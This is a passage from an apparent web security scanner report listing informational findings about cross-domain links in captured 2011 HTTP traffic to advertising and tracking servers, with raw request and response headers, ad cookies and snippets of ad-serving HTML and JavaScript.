GET /pagead/ads?client=ca-pub-1599446853501333&output=html&h=250&slotname=2575038140&w=300&lmt=1305224372&flash=10.2.154&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&dt=1305206954981&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=2030600084&correlator=1305206927004&frm=0&adk=1155457906&ga_vid=506792354.1305206912&ga_sid=1305206912&ga_hid=1496676679&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=9&dtd=11&xpc=NpoUXzJXbi&p=http%3A//www.gizmodo.com.au HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:31:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7969

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/%26hl%3Den%26client%3Dca-pub-1599446853501333%26adU%3DPerformerSoft.com/FasterDrivers%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF-Sw2bzd10lcr3-sJZe3ojk19tsQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
13.46. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070548&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607%2C1110596607&correlator=1305207063071&frm=0&adk=3938665893&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=4&dtd=130&xpc=wcnQKDCP5b&p=http%3A//www.milehighonthecheap.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:31:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1706

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe frameborder='0' marginwidth='0' marginheight='0' scrolling='no' width='160' height='600' src='http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTk2NDY1MzI1NDQwMzEvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHBmNzUtYWowd0pHOHN5dWFTWnc1Qm8v/eM1wOfWIxZ9RKD_2JFr8hJB1kM4&price=TcvhHwAGrxsK7Fqwx8QugpKAEgOl8KAu6D5byA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3GM9H-HLTZveGrC1sQeC3ZC-DNzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCxg_AAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtxXQhDQNGr4Rg9Q9u2Yp7R_clKOjA%26client%3Dca-pub-3629939364375984%26adurl%3D'></iframe>
...[SNIP]...
13.47. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070541&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945&correlator=1305207063071&frm=0&adk=166417643&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=2&dtd=85&xpc=tObyjq52qS&p=http%3A//www.milehighonthecheap.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:31:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 9761

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/%26hl%3Den%26client%3Dca-pub-3629939364375984%26adU%3DVCAHospitals.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEPjpG7USsH-9cP_6Xfg10wESqfiA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
13.48. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070545&bpp=2&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607&correlator=1305207063071&frm=0&adk=3981566363&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=3&dtd=114&xpc=HVEaewoQQ1&p=http%3A//www.milehighonthecheap.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:31:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1706

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe frameborder='0' marginwidth='0' marginheight='0' scrolling='no' width='160' height='600' src='http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTc0Njg0NDcyNTQwNDcvMTA0MTIwLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVGhpaXlIaTBCQlctVzV6TXhEOW5FbDgv/s3y_oOCh3r6kEExIjKyijkGnx4A&price=TcvhHwAGp0EK7FrEovpTs1SWtx2tmnBm2xV6cA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRcf1H-HLTcHOGsS1sQezp-mXCtzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCnBjAAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtzIVcp8F8Val1fxHHRvU63fV_G8kg%26client%3Dca-pub-3629939364375984%26adurl%3D'></iframe>
...[SNIP]...
13.49. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-ooBEAoYASABKAEw9cKv7gQQ9cKv7gQYAA..; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb198688=-@L6D208WMq5cpg20/dR_2Rq$?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQHRTtxg1ORd6SsYda6b2ziV14ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAADhABAgUCAAUAAAAAQBbqiQAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207157%29%3Buf%28%27c%27%2C+60150%2C+1305207157%29%3Buf%28%27r%27%2C+264207%2C+1305207157%29%3B&cnd=!SRusDwj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB5hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; path=/; expires=Fri, 13-May-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(ByDuq)W^19LVSfz9pR%*ZYG$q99Yuq/8WW+OZ<tV7`c1iRBAF0AjVTkAwOlt@lPUAZ6Jl:O2E6SNUC?FCurmX(R+I@3QnKv9%3ZeoT81tBj(_yLd$9SnvS(`p+IuV+`hf@7Jx26vK2fXWC$sIYvfgg:@BovHT96sY2^=P@LEqX4S#jqGct?v1A1I/vTA^>l3*5.-C=)@tgPx+bvY.RBYzyCLxiN*KmZkEFg(oEG-3_JrtQeKhlW'@l:!yPfu4(r>y2ftLNWl5+h@y!QeL8avOr+bkC^F<A?ba?dk760>y?6j2.'9s!F*+wE_X?AuNkL7M:IF84W#AWuxnqyZmCg)tFh4ZcY37>8Lcx5h%^$6oAkZ-WR$e3r<HnX?xLdr?PiPwulO]Jx1Mqy'fSa`1jYL[t]x1]#EdEMtygIe>*0$mP^?/l78sfudt*pccMNht6iGA6)+CyD/qG7eq>q=hBwU5h=tpr7wl$fg`plOqjf-je:`V#/YmIYduPo0+MxLW0VH%hehjHqNdWRzI(-nyc@S3EdNC<OKUKdP]kwScNWFj4`d920@lOkc4UWBXbUQ8@VfWqyk6Mh7>s5K*H[VZxv1466@vdcpA7abl-RkC-Zf444Z)<3o6HA?m)uRuv7t7[RWJj2>)>DD!WTU%g$L2LqQYlI`wp)t!PV0qm_6Cj>2/roFW)l8A@vbHxOrkIMm; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:32:37 GMT
Content-Length: 268

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565"></scr'+'ipt>');document.write('<img src="http://cm.g.doubleclick.net/pixel?nid=appnexus1" width="1" height="1"/>');
13.50. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /seg?add=119482&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-ooBEAoYASABKAEwlMKv7gQQlMKv7gQYAA..; acb126273=-@L6D208WMq5cpg20/dR>zXWq?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQB6f76tOO90oSsYda6b2ziUU4ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAAxhABAgUCAAUAAAAA5xc56wAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207060%29%3Buf%28%27c%27%2C+60150%2C+1305207060%29%3Buf%28%27r%27%2C+264207%2C+1305207060%29%3B&cnd=!RRvkDgj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB4hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hg0)m)_Uh2u:[r@PdBuy]S=FdY*FXw(hO!$dY(koMBFV95dEhO@gS%S=?Gc6U#?^ITW.C%.HqhKFPS0R:Ol/][9xsNXM?#=popAjMJ!=!P'kjdtE#agd`VY]hTg'7jxCPQLa-IWtYkK56-6Rj<>QtuQMu]Fli*-A:DG1t]9*q=ZNiI'q#a$$?('BmwWkq5M+gDc$AkjBcFpf.^Km7HkC6E*s*W!hVTSm=VV<zcaLjQ#u^1u!hUCx)6f1NpiP^1'?YjrnLNx0X+hS.)S$dNhv^T14kCT98KUh_Mm2P`S>yQhx3G-Rt#$gkLo]g)HuNl?T7v:=$P9r<oMjHGZ?fL9-L4qV?C[kwp-eJtVF#peHsxA-xhGAPY@nTUG3*pBV[T@@xw68=86_wVWO9'0NB.S=4gt<_3sB/bm8)W^6FLt^)4EgEJ/n!hdKiPI?u]%e5$Lu3[D]fwa%'PFavH5F)k4ZOPiuvV>cQWQorFp=v5%adk(P$^d0xFLswEkQxCTdbg4S$7QP#j1V6Zc+KDDhon2h0OFfImh+#oLE(br@zr_m-M%^o6v$@kezl*!N3zot*`H_R!Crp3O+$wmeHb:f=swYD<R*X1j7U1HH64sb>8f09y:8/XSP-Lk*'#mnr*d(+ZL4q_tb%p8LE0px*?qu^KY>qH>0:w9Q8K?zQK*Z1FYq4so09Y?yx#wwNwyrk6Ak

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(H.MX9)_c8%r9k>I9Fs/lDCm@m%aaoUQ!7QSDLeOJ8#%9ZVp(8]@gS%S=?GcnfylMw17$b)92!ZS.^.LpADBz%(R-fC*dkH/(6aknf3]vrI<lkEx1#2(x4)Q'hu(fX$hy)7-ZT3)t$Rg<7I+Bg.0OHlTJz4MRBsm2.y0_#FBs0?8nX9$*Xi`gA`F@'jmA33@n+%z6(u6bek:iXLY9f]6IJa)tAjQKXpXjP.zz493HBMUEEE*!vB6RV8aLW:>at^Bm4Bb1]M$RJ_$R(?QS=X2u's^/cuTyzwnqPoc=7yn*miVy@.SYnR@EPfNiVjyx-PiGvorkhIU(?Q!q.VLPOB+nIirYwcMG**0Oo1LofO)IObJoVO8Xlz]-.IMOwog.vY(BPmrr'I:uG-9Jg(x.h^vN?C%EFC3Q(12wezxcnx@NgUPp#6`GI%)sA]#^bE/ngv/`$kUjv5+O4zW*8AS=l8T8XjE0@CT6ZOZ>3O[(mhky/nO:s3DU26_I*kGhu>hFp?>-au@%zz:-(Kt(XD<@/._X1D4mncP-cQ!7ImeSXewri?lKAdKQL0Rg`jelNsC/IcQ9%t_$Ub><*HnS(]3?C(]D`%>CYaqwERcS#AUPg!'0P]qP)9J+9DrCVO7Je90tOvIO>RA1po$ip3J2iC1^Rg%H-LEiq9xVP4VKj'mu#Wy1hei<Nx/]P$d]wF@=80TAJ/!Rg@VCIXt39nnu'27f; path=/; expires=Wed, 10-Aug-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:34:09 GMT
Content-Length: 187

document.write('<img src="http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/2724386019227846218/gif?meta=appNexus" width="1" height="1"/>');
13.51. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/?p=238&g=001&ctg=Sports&subctg=Fight%20Sports&writertopic=Fight%20Sports%20Examiner&place=National&topic=Fight%20Sports&citystate=&section=Fight%20Sports&headline=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th,%20New%20'face'%20and%20new%20feuds HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
